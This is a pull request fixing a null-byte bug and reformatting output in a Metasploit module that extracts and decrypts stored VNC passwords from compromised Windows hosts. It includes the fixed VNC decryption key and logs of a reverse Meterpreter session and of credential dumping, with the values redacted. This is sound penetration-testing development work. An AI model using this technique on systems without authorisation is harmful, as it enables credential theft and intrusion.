### PR TITLE
Gather VNC null byte fix + formatting

### DIFF
--- a/modules/post/windows/gather/credentials/vnc.rb
+++ b/modules/post/windows/gather/credentials/vnc.rb
@@ -41,7 +41,7 @@ class Metasploit3 < Msf::Post
     # 5A B2 CD C0 BA DC AF 13
     fixedkey = "\x17\x52\x6b\x06\x23\x4e\x58\x07"
     pass = Rex::Proto::RFB::Cipher.decrypt ["#{hash}"].pack('H*'), fixedkey
-    return pass
+    return pass.gsub!(/\0/, '')
   end
 
   # Pull encrypted passwords from file based storage
@@ -200,7 +200,7 @@ class Metasploit3 < Msf::Post
     print_status("Enumerating VNC passwords on #{sysinfo['Computer']}")
 
     locations.map { |e|
-      print_status("Checking #{e[:name]}...")
+      vprint_status("Checking #{e[:name]}...")
       if e.has_key?(:check_reg)
         e[:port] = reg_get(e[:check_reg],e[:port_variable])
         e[:hash] = reg_get(e[:check_reg],e[:pass_variable])
@@ -223,7 +223,7 @@ class Metasploit3 < Msf::Post
         if e[:port] == nil
           e[:port] = 5900
         end
-        print_good("#{e[:name]} => #{e[:hash]} => #{e[:pass]} on port: #{e[:port]}")
+        print_good("Location: #{e[:name]} => Hash: #{e[:hash]} => Password: #{e[:pass]} => Port: #{e[:port]}")
 
         service_data = {
             address: ::Rex::Socket.getaddress(session.sock.peerhost, true),


### PR DESCRIPTION
## Summary

Target:
- OS: Windows 2000 SP4 ENG x86
- User: SYSTEM
- VNC: TightVNC v1.3.10
## Before

```
[*] Started reverse handler on <REMOVED>:443 
[*] Starting the payload handler...
[*] Sending stage (885806 bytes) to <REMOVED>
[*] Meterpreter session 1 opened (<REMOVED>:443 -> <REMOVED>:1040) at 2015-12-22 17:21:35 +0000
[*] Session ID 1 (<REMOVED>:443 -> <REMOVED>:1040) processing AutoRunScript 'migrate -f'
[*] Current server process: 443.exe (1784)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1464
[+] Successfully migrated to process 

msf exploit(handler) > sessions  -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : <REMOVED>
OS              : Windows 2000 (Build 2195).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/win32
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/gather/credentials/vnc
msf post(vnc) > set session 1
session => 1
msf post(vnc) > show options

Module options (post/windows/gather/credentials/vnc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.

msf post(vnc) > run

[*] Enumerating VNC passwords on <REMOVED>
[*] Checking UltraVNC...
[*] Checking WinVNC3_HKLM...
[*] Checking WinVNC3_HKCU...
[*] Checking WinVNC3_HKLM_Default...
[+] WinVNC3_HKLM_Default => <REMOVED> => <REMOVED> on port: 5900
[-] Post failed: ArgumentError string contains null byte
[-] Call stack:
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/connection_adapters/postgresql_adapter.rb:806:in `send_query_prepared'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/connection_adapters/postgresql_adapter.rb:806:in `exec_cache'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/connection_adapters/postgresql/database_statements.rb:139:in `block in exec_query'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/connection_adapters/abstract_adapter.rb:442:in `block in log'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activesupport-4.0.13/lib/active_support/notifications/instrumenter.rb:20:in `instrument'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/connection_adapters/abstract_adapter.rb:437:in `log'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/connection_adapters/postgresql/database_statements.rb:137:in `exec_query'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/connection_adapters/postgresql/database_statements.rb:181:in `exec_insert'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/connection_adapters/abstract/database_statements.rb:97:in `insert'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/connection_adapters/abstract/query_cache.rb:14:in `insert'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/relation.rb:76:in `insert'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/persistence.rb:513:in `_create_record'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/attribute_methods/dirty.rb:78:in `_create_record'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/callbacks.rb:306:in `block in _create_record'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activesupport-4.0.13/lib/active_support/callbacks.rb:373:in `_run__2773957953810837362__create__callbacks'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activesupport-4.0.13/lib/active_support/callbacks.rb:80:in `run_callbacks'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/callbacks.rb:306:in `_create_record'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/timestamp.rb:57:in `_create_record'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/persistence.rb:481:in `create_or_update'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/callbacks.rb:302:in `block in create_or_update'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activesupport-4.0.13/lib/active_support/callbacks.rb:383:in `_run__2773957953810837362__save__callbacks'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activesupport-4.0.13/lib/active_support/callbacks.rb:80:in `run_callbacks'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/callbacks.rb:302:in `create_or_update'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/persistence.rb:103:in `save'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/validations.rb:51:in `save'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/attribute_methods/dirty.rb:32:in `save'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/transactions.rb:270:in `block (2 levels) in save'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/transactions.rb:330:in `block in with_transaction_returning_status'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/connection_adapters/abstract/database_statements.rb:203:in `block in transaction'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/connection_adapters/abstract/database_statements.rb:211:in `within_new_transaction'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/connection_adapters/abstract/database_statements.rb:203:in `transaction'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/transactions.rb:209:in `transaction'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/transactions.rb:327:in `with_transaction_returning_status'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/transactions.rb:270:in `block in save'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/transactions.rb:285:in `rollback_active_record_state!'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/transactions.rb:269:in `save'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/persistence.rb:34:in `create'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/relation.rb:121:in `block in create'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/relation.rb:270:in `scoping'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/relation.rb:121:in `create'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/activerecord-4.0.13/lib/active_record/relation.rb:133:in `first_or_create'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/metasploit-credential-1.0.1/lib/metasploit/credential/creation.rb:389:in `block in create_credential_private'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/metasploit-credential-1.0.1/lib/metasploit/credential/creation.rb:532:in `retry_transaction'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/metasploit-credential-1.0.1/lib/metasploit/credential/creation.rb:383:in `create_credential_private'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/metasploit-credential-1.0.1/lib/metasploit/credential/creation.rb:130:in `create_credential'
[-]   /usr/share/metasploit-framework/lib/msf/core/auxiliary/report.rb:34:in `create_credential'
[-]   /usr/share/metasploit-framework/modules/post/windows/gather/credentials/vnc.rb:249:in `block in run'
[-]   /usr/share/metasploit-framework/modules/post/windows/gather/credentials/vnc.rb:202:in `map'
[-]   /usr/share/metasploit-framework/modules/post/windows/gather/credentials/vnc.rb:202:in `run'
[*] Post module execution completed
msf post(vnc) >
```

---
## After

**Normal**

```
msf post(vnc) > reload
[*] Reloading module...
msf post(vnc) > show options 

Module options (post/windows/gather/credentials/vnc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.

msf post(vnc) > run

[*] Enumerating VNC passwords on <REMOVED>
[+] Location: WinVNC3_HKLM_Default => Hash: <REMOVED> => Password: <REMOVED> => Port: 5900
[+] Location: WinVNC4_HKLM => Hash: <REMOVED> => Password: <REMOVED> => Port: 5900
[*] Post module execution completed
msf post(vnc) >
```

**Verbose**

```
msf post(vnc) > set verbose true
verbose => true
msf post(vnc) > run

[*] Enumerating VNC passwords on <REMOVED>
[*] Checking UltraVNC...
[*] Checking WinVNC3_HKLM...
[*] Checking WinVNC3_HKCU...
[*] Checking WinVNC3_HKLM_Default...
[+] Location: WinVNC3_HKLM_Default => Hash: <REMOVED> => Password: <REMOVED> => Port: 5900
[*] Checking WinVNC3_HKCU_Default...
[*] Checking WinVNC_HKLM_Default...
[*] Checking WinVNC_HKCU_Default...
[*] Checking WinVNC4_HKLM...
[+] Location: WinVNC4_HKLM => Hash: <REMOVED> => Password: <REMOVED> => Port: 5900
[*] Checking WinVNC4_HKCU...
[*] Checking RealVNC_HKLM...
[*] Checking RealVNC_HKCU...
[*] Checking TightVNC_HKLM...
[*] Checking TightVNC_HKLM_Control_pass...
[*] Checking RealVNC_S-1-5-21-1606980848-73586283-839522115-500...
[*] Checking WinVNC4_S-1-5-21-1606980848-73586283-839522115-500...
[*] Checking WinVNC_S-1-5-21-1606980848-73586283-839522115-500_Default...
[*] Checking WinVNC3_S-1-5-21-1606980848-73586283-839522115-500_Default...
[*] Checking WinVNC3_S-1-5-21-1606980848-73586283-839522115-500...
[*] Post module execution completed
msf post(vnc) >
```
